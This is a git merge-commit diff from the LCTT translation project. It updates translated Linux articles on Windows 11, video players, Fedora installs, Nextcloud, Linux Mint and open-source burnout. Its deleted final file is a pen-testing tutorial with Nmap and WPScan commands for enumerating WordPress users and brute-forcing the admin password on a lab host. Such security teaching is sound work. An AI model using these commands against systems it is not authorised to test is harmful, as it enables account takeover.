Merge pull request #7 from LCTT/master

update 0802
This commit is contained in:
SamMa 2021-08-02 09:22:40 +08:00 committed by GitHub
commit 55789d7180
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
73 changed files with 695 additions and 817 deletions

View File

@ -0,0 +1,111 @@
[#]: subject: (Windows 11 Makes Your Hardware Obsolete, Use Linux Instead!)
[#]: via: (https://news.itsfoss.com/windows-11-linux/)
[#]: author: (Ankush Das https://news.itsfoss.com/author/ankush/)
[#]: collector: (lujun9972)
[#]: translator: (zd200572)
[#]: reviewer: (wxy)
[#]: publisher: (wxy)
[#]: url: (https://linux.cn/article-13640-1.html)
Windows 11 让你的硬件过时,使用 Linux 代替吧!
======
> 微软希望你为 Windows 11 买新的硬件。你是否应该为 Windows 11 升级你的电脑,或者只是,用 Linux 代替!?
![](https://i1.wp.com/news.itsfoss.com/wp-content/uploads/2021/06/windows-to-linux.png?w=1200&ssl=1)
Windows 11 终于来了,我们并不完全对此感到兴奋,它给许多电脑用户带来了困扰。
我甚至不是在讨论隐私方面或者它的设计选择,而是 Windows 11 要求更新的硬件才能工作,这在某种程度上让你的旧电脑变得过时,并迫使你毫无理由地升级新的硬件。
随着 Windows 11 的到来还有什么问题呢,它有什么不好的?
### 只有符合条件的设备才能获得 Windows 11 升级
首先有意思的是Windows 11 添加了一个最低系统需求,这表面上看起来还行:
* 1GHz 双核 64 位处理器
* 4GB 内存
* 64GB 存储空间
* 支持 UEFI 安全启动
* 受信任平台模块TPM版本 2.0
* DirectX 12 兼容显卡
* 720P 分辨率显示器
![][1]
你可以在 [微软官方网站][2] 下载“电脑健康状况检查”应用检查你的系统是否符合条件。
过去十年内的大多数电脑能达到这些标准 —— 但有一个陷阱。
硬件需要有一个 TPM 芯片,一些电脑和笔记本可能没有。幸运的是,你可能只需要从 BIOS 设置中启用它(包括安全引导支持),就可以使你的电脑符合条件。这里有一个 [PCGamer][3] 的向导可以帮你。
从技术上说根据微软官方文档Windows 11 不支持比 **Intel 第 8 代和 Ryzen 3000 系列**更老的处理器([AMD][4] | [Intel][5])。
可是,有相当数量的电脑不支持,你该怎么做?
很简单,在 Windows 10 不再收到更新之前,[都 2021 年了,换成 Linux 吧][6]。今年,在你的个人电脑上尝试 Linux 变得比任何时候更有意义!
### Windows 11 安装需要网络连接
![][7]
虽然我们不太清楚但根据其系统要求规范Windows 11 安装过程中将要求用户有可连通的互联网连接。
但是Linux 不需要这样。
这只是其中一个 [使用 Linux 而不是 Windows][8] 的好处 —— 这是你可以完全掌控的操作系统。
### 没有 32 位支持
![][12]
Windows 10 确实是支持 32 位系统的,但是 Windows 11 终结了相关支持。
这又是 Linux 的优势了。
尽管对 32 位支持都在逐渐减少,我们依然有一系列 [支持 32 位系统的 Linux 发行版][9]。或许你的 32 位电脑还能与 Linux 一起工作 10 年。
### Windows 10 将在 2025 年结束支持
好吧,鉴于微软最初计划在 Windows 10 之后永远不会有升级,而是在可预见的未来一直支持它,这是个意外。
现在Windows 10 将会在 2025 年被干掉……
那么,到时候你该怎么做呢?升级你的硬件,只因为它不支持 Windows 11
除非有这个必要,否则 Linux 是你永远的朋友。
你可以尝试几个 [轻量级 Linux 发行版][10],它们将使你的任何一台被微软认为过时的电脑重新焕发生机。
### 结语
尽管 Windows 11 计划在未来几年内强迫用户升级他们的硬件,但 Linux 可以让你长时间继续使用你的硬件,并有一些额外的好处。
因此,如果你对 Windows 11 的发布不满意,你可能想开始使用 Linux 代替。不要烦恼,你可以参考我们的指南,来学习开始使用 Linux 的一切知识。
--------------------------------------------------------------------------------
via: https://news.itsfoss.com/windows-11-linux/
作者:[Ankush Das][a]
选题:[lujun9972][b]
译者:[zd200572](https://github.com/zd200572)
校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://news.itsfoss.com/author/ankush/
[b]: https://github.com/lujun9972
[1]: https://i2.wp.com/news.itsfoss.com/wp-content/uploads/2021/06/windows-11-requirements-new.png?w=1026&ssl=1
[2]: https://www.microsoft.com/en-us/windows/windows-11
[3]: https://www.pcgamer.com/Windows-11-PC-Health-Check/
[4]: https://docs.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-supported-amd-processors
[5]: https://docs.microsoft.com/en-us/windows-hardware/design/minimum/supported/windows-11-supported-intel-processors
[6]: https://news.itsfoss.com/switch-to-linux-in-2021/
[7]: https://i1.wp.com/news.itsfoss.com/wp-content/uploads/2021/06/internet-connectivity-illustration.png?w=1200&ssl=1
[8]: https://itsfoss.com/linux-better-than-windows/
[9]: https://itsfoss.com/32-bit-linux-distributions/
[10]: https://itsfoss.com/lightweight-linux-beginners/
[11]: https://itsfoss.com
[12]: https://i0.wp.com/news.itsfoss.com/wp-content/uploads/2021/06/32-bit-support-illustration.png?w=1200&ssl=1

View File

@ -4,8 +4,8 @@
[#]: collector: (lujun9972)
[#]: translator: (geekpi)
[#]: reviewer: (turbokernel)
[#]: publisher: ( )
[#]: url: ( )
[#]: publisher: (wxy)
[#]: url: (https://linux.cn/article-13638-1.html)
认识 Clapper一款外观时尚的 Linux 视频播放器,极简主义者适用
======
@ -16,7 +16,7 @@ Clapper 是一个全新 [Linux 视频播放器][1]。实际上,它更多的是
它基于 GNOME 的 JavaScript 库和 GTK4 工具包构建,自然地融合在 GNOME 的桌面环境中。它使用 [GStreamer][2] 作为媒体后端,使用 [OpenGL][3] 进行渲染。
我喜欢极简主义的应用。虽然 VLC 是媒体播放器中的瑞士刀,但我更喜欢 [MPV 播放器][4],因为它的界面时尚、简约。现在我想要坚持使用 Clapper 一段时间了。
我喜欢极简主义的应用。虽然 VLC 是媒体播放器中的瑞士刀,但我更喜欢 [MPV 播放器][4],因为它的界面时尚、简约。现在我想要坚持使用 Clapper 一段时间了。
### Clapper 视频播放器
@ -32,28 +32,25 @@ Clapper 是一个全新 [Linux 视频播放器][1]。实际上,它更多的是
* 浮动模式:隐藏进度条,播放器浮于其他应用程序的顶部,就像“[总是在顶部][8]”或“画中画”模式。
* 全屏模式:播放器进入全屏,进度条变大,但它们都会自动隐藏起来
![Interface of Clapper video player with preference control and window modes][9]
Clapper 也有一个自适应的用户界面,可基于 Linux 的智能手机和平板电脑上使用。因此,如果你有自己的 Pine Phone 或 Librem5你可以在它上面使用 Clapper。
它支持字幕,并可选择改变字体。然而,在我的测试中,字幕并不可用。也没有可以明确地在播放的视频中添加字幕的选项。这一点必须改进。
和 VLC 一样如果你再次打开同一个视频文件Clapper 也可以让你选择从最后一个时间点恢复播放。这是我喜欢的 VLC 中的一个[方便的功能][10]。
和 VLC 一样如果你再次打开同一个视频文件Clapper 也可以让你选择从最后一个时间点恢复播放。这是我喜欢的 VLC 中的一个 [方便的功能][10]。
如果你有 URLClapper 也支持从互联网上播放视频。
这里的截图中,我正在 Clapper 中播放一个 YouTube 视频。这是一首由一位美丽的歌手和演员唱的优美歌曲。你能猜到这是哪首歌或哪部电影吗?
![Clapper playing a video from YouTube][11]
### 在 Linux 上安装 Clapper
对 Arch 和 Manjaro 用户而言Clapper 可在 AUR 中找到。这很稀疏平常因为AUR 包罗万象。
对 Arch 和 Manjaro 用户而言Clapper 可在 AUR 中找到。这很稀疏平常,因为 AUR 包罗万象。
对于其他发行版Clapper 官方提供了 [Flatpak 包][12]。所以,请[为你的发行版启用 Flatpak 支持][13],然后使用下面的命令来安装它:
对于其他发行版Clapper 官方提供了 [Flatpak 包][12]。所以,请 [为你的发行版启用 Flatpak 支持][13],然后使用下面的命令来安装它:
```
flatpak install flathub com.github.rafostar.Clapper

View File

@ -3,16 +3,18 @@
[#]: author: (Abhishek Prakash https://itsfoss.com/author/abhishek/)
[#]: collector: (lujun9972)
[#]: translator: (geekpi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
[#]: reviewer: (wxy)
[#]: publisher: (wxy)
[#]: url: (https://linux.cn/article-13637-1.html)
如何在 Fedora Linux 上安装 VLC
======
![](https://img.linux.net.cn/data/attachment/album/202107/31/215634thkmiihq1limel4i.jpg)
如果你刚刚安装了 Fedora现在想在上面安装你最喜欢的视频播放器 VLC你可能不会在软件中心找到它。至少不会立即找到。
由于开发者最清楚的原因Fedora 既没有安装 [VLC][1],也不包括在 Fedora 官方仓库中。
出于只有它的开发者知道的原因Fedora 既没有安装 [VLC][1],也不包括在 Fedora 官方仓库中。
那么,你如何在 Fedora 上安装 VLC 呢很简单。RPM Fusion 是你的朋友。让我告诉你详细的步骤。
@ -26,13 +28,13 @@
sudo dnf install https://mirrors.rpmfusion.org/free/fedora/rpmfusion-free-release-$(rpm -E %fedora).noarch.rpm
```
当被要求确认添加新仓库时按 Y。接下来使用 DNF 命令安装 VLC
当被要求确认添加新仓库时按 `Y`。接下来,使用 DNF 命令安装 VLC
```
sudo dnf install vlc
```
它将在 Fedora 中从RPM Fusion 仓库中安装 VLC并从不同的仓库中安装一些额外的依赖项。
它将在 Fedora 中从 RPM Fusion 仓库中安装 VLC并从不同的仓库中安装一些额外的依赖项。
![Installing VLC in Fedora with DNF command][2]
@ -65,7 +67,7 @@ via: https://itsfoss.com/install-vlc-fedora/
作者:[Abhishek Prakash][a]
选题:[lujun9972][b]
译者:[geekpi](https://github.com/geekpi)
校对:[校对者ID](https://github.com/校对者ID)
校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

View File

@ -3,21 +3,24 @@
[#]: author: (Arindam https://www.debugpoint.com/author/admin1/)
[#]: collector: (lujun9972)
[#]: translator: (geekpi)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
[#]: reviewer: (wxy)
[#]: publisher: (wxy)
[#]: url: (https://linux.cn/article-13641-1.html)
在 Fedora 34 及以上版本中安装 Shutter
======
这个快速指南解释了在 Fedora 34 及以上版本中安装 shutter 所需的步骤。
截图工具有很多替代和选择。但在我个人看来,没有一个能接近 Shutter 的灵活性。不幸的是多年来Linux 发行版,如 Ubuntu、Fedora由于各种依赖性问题特别是它的设计方式面临着将这个应用打包到官方仓库的问题。
![](https://img.linux.net.cn/data/attachment/album/202108/01/211059fzo531621ydrr27k.jpg)
> 这个快速指南解释了在 Fedora 34 及以上版本中安装 Shutter 所需的步骤。
截图工具有很多替代和选择。但在我个人看来,没有一个能接近 Shutter 的灵活性。不幸的是由于各种依赖性问题特别是它的设计方式多年来Linux 发行版,如 Ubuntu、Fedora都面临着将这个应用打包到官方仓库的问题。
主要问题是它仍然基于 GTK2 和 Perl。当大多数应用转移到 GTK3 时,它仍然是 GTK2。这就造成了一个依赖性问题因为 Debian/Ubuntu、Fedora 删除了某些包的依赖的 GTK2 版本。
在 Fedora 34 及以上版本中安装 [Shutter][1] 截图工具需要采用另一种方法。
现在,你只能通过个人包存档来安装这个工具。下面是如何在 Fedora 34 及以上版本中安装它。
现在,你只能通过个人包存档PPA来安装这个工具。下面是如何在 Fedora 34 及以上版本中安装它。
![Shutter in Fedora][2]
@ -29,7 +32,7 @@
sudo dnf copr enable geraldosimiao/shutter
```
完成后,你就可以通过 dnf 在 Fedora 34 及以上版本中简单地安装 shutter。
完成后,你就可以通过 `dnf` 在 Fedora 34 及以上版本中简单地安装 Shutter。
```
sudo dnf install shutter
@ -55,11 +58,11 @@ sudo dnf autoremove shutter
#### 在其他 Linux 发行版中安装 Shutter
如果你想在 Debian、Ubuntu 或相关发行版中安装它,请[查看此指南][4]。
如果你想在 Debian、Ubuntu 或相关发行版中安装它,请 [查看此指南][4]。
### Shutter 的开发
最近,这个项目[转移到了 GitHub][6],以便更好地合作,并且正在进行 GTK3 移植。而且它相当活跃,最近还发布了一个版本。我们希望它能尽快被移植到 gtk3 上,并在各发行版的原生仓库中可用。
最近,这个项目 [转移到了 GitHub][6],以便更好地协作,并且正在进行 GTK3 移植。而且它相当活跃,最近还发布了一个版本。我们希望它能尽快被移植到 GTK3 上,并在各发行版的原生仓库中可用。
如果你在安装 Shutter 时遇到任何错误,请在评论栏告诉我。
@ -70,7 +73,7 @@ via: https://www.debugpoint.com/2021/07/install-shutter-fedora/
作者:[Arindam][a]
选题:[lujun9972][b]
译者:[geekpi](https://github.com/geekpi)
校对:[校对者ID](https://github.com/校对者ID)
校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

View File

@ -1,101 +0,0 @@
[#]: subject: (Nextcloud Hub 22 Makes It Easy to Collaborate and Manage Groups)
[#]: via: (https://news.itsfoss.com/nextcloud-hub-22-release/)
[#]: author: (Ankush Das https://news.itsfoss.com/author/ankush/)
[#]: collector: (lujun9972)
[#]: translator: ( )
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Nextcloud Hub 22 Makes It Easy to Collaborate and Manage Groups
======
[Nextcloud][1] is one of the best open-source remote working tools available.
With every new release, it is just keeps getting better. The latest Nextcloud Hub 22 release introduces significant improvements to the workflow and a new app that should make it easier to collaborate and efficiently manage groups.
### Nextcloud Hub 22: Whats New?
Here, let me highlight the key changes involved in the release.
#### Collectives App to Manage and Share Knowledge
![][2]
Taking notes or managing information that you consume in an individual level is doable. But, how do you ease knowledge management and sharing for a group of individuals?
Collectives app comes to the rescue with Nextcloud 22 that lets you create pages/subpages to structure knowledge and cross-document links to interlink information.
You can manage access to the information using user-defined groups, which is also a new feature introduced with this release.
#### User-defined Groups
![][3]
Normally, the administrator manages groups/teams. But, with user-defined groups i.e. **Circles**, you can add anyone from your contacts to form a group without needing an administrator.
A circle is a custom group anyone can create. You can also choose to make it visible to other members or keep it private.
This lets you easily share tasks/files with a particular circle.
#### Integrated Chat and Task Management
As part of an improved workflow, Nextcloud 22 lets you turn a chat message to deck card to quickly assign a task.
![][4]
You will get the ability to tweak the due date and assign it to someone specific.
Also, you can easily share the deck card created in a chat room of your choice.
#### Document Signing & Approval
![][5]
Another major improvement to the workflow is the introduction of document signing capabilities within Nextcloud and the document approval option.
You get support for PDF signing tools like LibreSign and DocuSign. You can get a formal signature for any of your documents without leaving Nextcloud, make things more convenient.
The approval option also lets you share proposals or applications and get a response within Nextcloud.
#### Other Improvements
With Nextcloud 22, you can finally restore deleted calendar events. When deleted, the calendar events reside in a trash bin, which gives you the chance to look back for about a month.
In addition to the new features, there are performance and security upgrades as well.
If you are curious, you can check out the [official announcement post][6] about this release.
You should find the latest Nextcloud version available to download for desktop, mobile, and server in the official website.
[Download Nextcloud 22][7]
If you want help installing it in your server, go through our tutorial on [installing Nextcloud with Docker][8].
#### Big Tech Websites Get Millions in Revenue, It's FOSS Got You!
If you like what we do here at It's FOSS, please consider making a donation to support our independent publication. Your support will help us keep publishing content focusing on desktop Linux and open source software.
I'm not interested
--------------------------------------------------------------------------------
via: https://news.itsfoss.com/nextcloud-hub-22-release/
作者:[Ankush Das][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://news.itsfoss.com/author/ankush/
[b]: https://github.com/lujun9972
[1]: https://itsfoss.com/nextcloud/
[2]: https://i0.wp.com/i.ytimg.com/vi/yeKRhD3GG3Y/hqdefault.jpg?w=780&ssl=1
[3]: https://i0.wp.com/i.ytimg.com/vi/AD--RNtC89Y/hqdefault.jpg?w=780&ssl=1
[4]: https://i2.wp.com/i.ytimg.com/vi/OOOTYMpXXvQ/hqdefault.jpg?w=780&ssl=1
[5]: https://i1.wp.com/i.ytimg.com/vi/iqx3E1a3FfA/hqdefault.jpg?w=780&ssl=1
[6]: https://nextcloud.com/blog/nextcloud-hub-22-introduces-approval-workflows-integrated-knowledge-management-and-decentralized-group-administration/
[7]: https://nextcloud.com/install/
[8]: https://linuxhandbook.com/install-nextcloud-docker/

View File

@ -1,119 +0,0 @@
[#]: subject: (Linux Mint 20.2 “Uma” Released. This is Whats New)
[#]: via: (https://www.debugpoint.com/2021/07/linux-mint-20-2-release-announcement/)
[#]: author: (Arindam https://www.debugpoint.com/author/admin1/)
[#]: collector: (lujun9972)
[#]: translator: ( )
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Linux Mint 20.2 “Uma” Released. This is Whats New
======
Linux Mint 20.2 Uma is now available for download and to upgrade. We
wrap up the release for you with download instructions.In
Brief:Details:Bulky
![Linux Mint 20.2 Cinnamon Desktop][1]
The latest installment of Linux Mint is [announced][2]. This second installment of Linux Mint 20 series code-named “Uma” brings some cool features alongside the usual package and application updates. This release contains 6 month worth of updates since the release of Linux Mint 20.1.
Here are the top new features.
### Linux Mint 20.2 Whats New
Packages and Components summary in Linux Mint 20.2.
* Based on Ubuntu 20.04.2 LTS
* Linux Kernel 5.4.0
* Cinnamon Desktop 5.0.2
* Xfce Desktop 4.16
* MATE Desktop 1.24
* Python 3.8.5
* Firefox 89.0
* LibreOffice 6.4.7.2
* New XApp Bulky 1.3
* Warpinator 1.2.2
#### Core
The Linux Mint 20.x entire series is based on Ubuntu 20.04 LTS. That means, the Kernel version, packages remain aligned to the Ubuntu LTS version. Hence with this release, you get Linux Kernel 5.4 and other stable core updates.
#### New App Bulky
![New Bulky App \(Image Credit Mint\)][3]
A new native application is introduced in the Uma release. Named “” this desktop utility helps you to rename files and directories in batch. It has options like regular expression and other search features which help while remaining files and directories of similar patterns. It is primarily for MATE and Cinnamon flavor. The application is available as “File Renamer” in the application menu.
#### Warpinator Updates
Warpinator which is one of the best Linux Mint app used to transfer files across the Network (Wired and Wireless), brings more enhancement. In the next version, it gives you the ability to select the Network Interface which you want to use for file transfer. If you have both Wired and Wireless ethernet, you can select which one you want to use to share files to another device on the same selected network interface.
[][4]
SEE ALSO:   How to Upgrade to Linux Mint 20.2 from 20.1
Not only that, but it also brings compression settings which enable “3 times faster” transfer across devices provided both the machine have the compression enabled.
#### Nemo 5.0
![Search in File Contents in Nemo File Manager][5]
The Cinnamon file manager Nemo version 5.0.1 brings file content search which is part of the Cinnamon 5.0 release. Today, Nemo only searches in the file and directory names for matching search criteria. With this enhancement, Nemo can search inside the file contents for a keyword. The team says that Regular expressions and recursive folder searches are also supported. This feature will be very useful for many users who use Linux Mint as a daily driver and work with many files as part of their workflow.
#### Others
“Nvidia-prime-applet 1.2.7 was backported recently. It contains a fix for a regression in ubuntu-drivers-common which made the applet disappear.
It also contains support for computers with AMD/NVIDIA hybrids (i.e. systems with an integrated AMD GPU and a discrete NVIDIA GPU).”
### Linux Mint 20.2 Download
The .iso files can now be downloaded from the below torrents for respective desktop environment Xfce, Cinnamon and MATE.
* [Cinnamon Torrent Download][6]
* [MATE Torrent Download][7]
* [Xfce Torrent Download][8]
If you are running [Linux Mint 20.1 Ulyssa][9], then wait for a day or two, you should get the updates via Linux Mint update manager.
### Upgrade Steps
The upgrade to Linux Mint 20.2 is pretty straight forward with a bit of caution. [Here is the detailed guide of the upgrade.][4]
> [How to Upgrade to Linux Mint 20.2 from 20.1][4]
Official Release notes are available in the below places.
* <https://www.linuxmint.com/rel_uma_cinnamon.php>
* <https://www.linuxmint.com/rel_uma_mate.php>
* <https://www.linuxmint.com/rel_uma_xfce.php>
* * *
--------------------------------------------------------------------------------
via: https://www.debugpoint.com/2021/07/linux-mint-20-2-release-announcement/
作者:[Arindam][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://www.debugpoint.com/author/admin1/
[b]: https://github.com/lujun9972
[1]: https://www.debugpoint.com/blog/wp-content/uploads/2021/07/Linux-Mint-20.2-Cinnamon-Desktop-1024x768.jpeg
[2]: https://blog.linuxmint.com/?p=4102
[3]: https://www.debugpoint.com/blog/wp-content/uploads/2021/06/New-Bulky-App-Image-Credit-Mint.png
[4]: https://www.debugpoint.com/2021/07/upgrade-linux-mint-20-2/
[5]: https://www.debugpoint.com/blog/wp-content/uploads/2021/06/Search-in-File-Contents-in-Nemo-File-Manager.jpg
[6]: https://linuxmint.com/torrents/linuxmint-20.2-cinnamon-64bit.iso.torrent
[7]: https://linuxmint.com/torrents/linuxmint-20.2-mate-64bit.iso.torrent
[8]: https://linuxmint.com/torrents/linuxmint-20.2-xfce-64bit.iso.torrent
[9]: https://www.debugpoint.com/2021/01/linux-mint-20-1-release-announcement/

View File

@ -0,0 +1,105 @@
[#]: subject: (Dealing with burnout in open source)
[#]: via: (https://opensource.com/article/21/7/burnout-open-source)
[#]: author: (Kiran Oliver https://opensource.com/users/kiranoliver-0)
[#]: collector: (lujun9972)
[#]: translator: ( )
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Dealing with burnout in open source
======
What it is, why you should care, and how you can help prevent burnout.
![Red heart with text "you are not alone"][1]
Burnout is something you don't expect to happen to you—until it does. The technology industry is one of the worst offenders; over [60% of industry professionals][2] report they've experienced burnout. Sixty percent! Chances are, you or someone you know has dealt with it. How can we tackle such a staggering burnout rate if those who make decisions about mental health barely know what burnout is, never mind how to prevent it?
The answer is to start simple. Ask the question "what is burnout?" and go from there.
![Definition of burnout][3]
(Kiran Oliver, [CC BY-SA 4.0][4])
### Autistic burnout, neurodivergence, and mental health
At [Upstream 2021][5], the Tidelift event that kicked off Maintainer Week celebrating open source maintainers, I gave [a talk about burnout in open source][6]. The individuals who attended my presentation shared their experiences with burnout and mental health as a whole, which are undeniably linked.
Burnout manifests in cognitive, emotional, and physical symptoms. It can take on different forms that are unique to the individual experiencing it.
Also, people who are [neurodivergent][7] (e.g., have autism, ADD/ADHD, dyslexia, dyspraxia, etc.) may have standard burnout symptoms, but it can also manifest as [autistic burnout][8], which is often harder to pin down. Crucially, burnout in neurodivergent employees can look like someone is slacking off, not doing their job, or missing important details, when none of these things are correct.
### How to help people experiencing burnout
When addressing burnout on a team, managers can do a few things to ensure the team has a psychologically safe environment:
1. Ask your human resources department if your insurance company offers mental health services.
2. Make sure employees know about your company insurance plan's mental health benefits.
3. Offer flexible time off.
4. Be flexible with deadlines, if possible.
5. Use asynchronous meetings.
6. Embody best practices by taking time off and encouraging your team to do so.
7. Learn to recognize the signs of burnout in yourself and others.
As an individual contributor, you might be wondering how you can help your teammates. Here are some things that you can do:
1. Assign someone to triage issues, or implement an auto-labeling process on your team's kanban and ticketing systems.
2. Make use of integrations and [productivity tools][9]. 
3. [Automate your business processes][10] wherever possible.
4. Have a clearly defined process for code reviews.
5. Encourage maintainers and contributors to take breaks.
6. Understand and recognize the signs of burnout in yourself and others.
### Burnout in open source communities
In open source communities, burnout can lead to not responding to pull requests or leaving issues open for an extended period of time. It can look like missing meetings, roadmap deadlines, or general forgetfulness. It can also produce emotional fatigue, [anxiety][11], and stress, so someone might be more tired than usual or speak in a tone of voice different from their usual. They may also feel drained and lack the motivation to contribute to open source while struggling with burnout. For open source project maintainers, burnout can be a real challenge that the entire industry must continue to address.
![What's under the surface of burnout][12]
(Kiran Oliver, [CC BY-SA 4.0][4])
Recognizing burnout requires vulnerability on behalf of the person experiencing it as well as understanding and compassion from any person told about a team member feeling this way. If someone tells you they are burned out, respect and keep this information private. Do not broadcast it publicly, nor share it with anyone who does not need to know for official medical or legal reasons. 
### Key takeaways
Burnout is a genuine issue that impacts many open source practitioners. Here are some tips for how to address it in open source organizations and communities:
* Be more accepting of neurodivergence in the workplace.
* Create supportive policies and procedures for employees in your organization or open source community that may be experiencing burnout.
* If you are a contributor to a large open source project, make sure you use automation and tools that allow people to step away and take a break with ease.
* Lean on your community for support.
* Learn to recognize the signs of burnout—not only in yourself but also in others.
* Support your community, and remember that it's okay to admit to feeling burned out.
Do you have any other tips for dealing with burnout, either personally or with your open source colleagues? Please share them in the comments.
--------------------------------------------------------------------------------
via: https://opensource.com/article/21/7/burnout-open-source
作者:[Kiran Oliver][a]
选题:[lujun9972][b]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]: https://opensource.com/users/kiranoliver-0
[b]: https://github.com/lujun9972
[1]: https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/red-love-heart-alone-stone-path.jpg?itok=O3q1nEVz (Red heart with text "you are not alone")
[2]: https://usblog.teamblind.com/wp-content/uploads/2020/03/TheStateof-Burnout2020.pdf
[3]: https://opensource.com/sites/default/files/uploads/burnoutdefinition.png (Definition of burnout)
[4]: https://creativecommons.org/licenses/by-sa/4.0/
[5]: https://upstream.live/
[6]: https://www.youtube.com/watch?v=WlQmwAJc5n4&list=PLDlsR_qA-s0gbycSxXNQIF_LhsMThD3Zi&index=9
[7]: https://neurocosmopolitanism.com/neurodiversity-some-basic-terms-definitions/
[8]: https://www.autism.org.uk/advice-and-guidance/topics/mental-health/autistic-fatigue/autistic-adults
[9]: https://opensource.com/article/21/1/open-source-productivity-apps
[10]: https://camunda.com/solutions/human-workflow/
[11]: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6424886/
[12]: https://opensource.com/sites/default/files/uploads/burnouticeburg.png (What's under the surface of burnout)

View File

@ -1,295 +0,0 @@
[#]: subject: (Pen testing with Linux security tools)
[#]: via: (https://opensource.com/article/21/5/linux-security-tools)
[#]: author: (Peter Gervase https://opensource.com/users/pgervase)
[#]: collector: (lujun9972)
[#]: translator: (MjSeven)
[#]: reviewer: ( )
[#]: publisher: ( )
[#]: url: ( )
Pen testing with Linux security tools
======
Use Kali Linux and other open source tools to uncover security gaps and
weaknesses in your systems.
![Magnifying glass on code][1]
The multitude of well-publicized breaches of large consumer corporations underscores the critical importance of system security management. Fortunately, there are many different applications that help secure computer systems. One is [Kali][2], a Linux distribution developed for security and penetration testing. This article demonstrates how to use Kali Linux to investigate your system to find weaknesses.
Kali installs a lot of tools, all of which are open source, and having them installed by default makes things easier.
![Kali's tools][3]
(Peter Gervase, [CC BY-SA 4.0][4])
The systems that I'll use in this tutorial are:
1. `kali.usersys.redhat.com`: This is the system where I'll launch the scans and attacks. It has 30GB of memory and six virtualized CPUs (vCPUs).
2. `vulnerable.usersys.redhat.com`: This is a Red Hat Enterprise Linux 8 system that will be the target. It has 16GB of memory and six vCPUs. This is a relatively up-to-date system, but some packages might be out of date.
3. This system also includes `httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64`, `mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64`, `tigervnc-server-1.9.0-15.el8_1.x86_64`, `vsftpd-3.0.3-32.el8.x86_64`, and WordPress version 5.6.1.
I included the hardware specifications above because some of these tasks are pretty demanding, especially for the target system's CPU when running the WordPress Security Scanner ([WPScan][5]).
### Investigate your system
I started my investigation with a basic Nmap scan on my target system. (You can dive deeper into Nmap by reading [Using Nmap results to help harden Linux systems][6].) An Nmap scan is a quick way to get an overview of which ports and services are visible from the system initiating the Nmap scan.
![Nmap scan][7]
(Peter Gervase, [CC BY-SA 4.0][4])
This default scan shows that there are several possibly interesting open ports. In reality, any open port is possibly interesting because it could be a way for an attacker to breach your network. In this example, ports 21, 22, 80, and 443 are nice to scan because they are commonly used services. At this early stage, I'm simply doing reconnaissance work and trying to get as much information about the target system as I can.
I want to investigate port 80 with Nmap, so I use the `-p 80` argument to look at port 80 and `-A` to get information such as the operating system and application version.
![Nmap scan of port 80][8]
(Peter Gervase, [CC BY-SA 4.0][4])
Some of the key lines in this output are:
```
PORT   STATE SERVICE VERSION
80/tcp open  http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1
```
Since I now know this is a WordPress server, I can use WPScan to get information about potential weaknesses. A good investigation to run is to try to find some usernames. Using `--enumerate u` tells WPScan to look for users in the WordPress instance. For example:
```
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
        __              _______   _____
        \ \     / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
        \ \/  \/ / |  ___/ \\___ \ / __|/ _` | '_ \
                \  /\  /  | |   ____) | (__| (_| | | | |
                \/  \/   |_|    |_____/ \\___|\\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                        Version 3.8.10
        Sponsored by Automattic - <https://automattic.com/>
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://vulnerable.usersys.redhat.com/> [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021
Interesting Finding(s):
...
[i] User(s) Identified:
[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```
This shows there are two users: `admin` and `pgervase`. I'll try to guess the password for `admin` by using a password dictionary, which is a text file with lots of possible passwords. The dictionary I used was 37G and had 3,543,076,137 lines.
Like there are multiple text editors, web browsers, and other applications you can choose from, there are multiple tools available to launch password attacks. Here are two example commands using Nmap and WPScan:
```
`# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com`[/code] [code]`# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt`
```
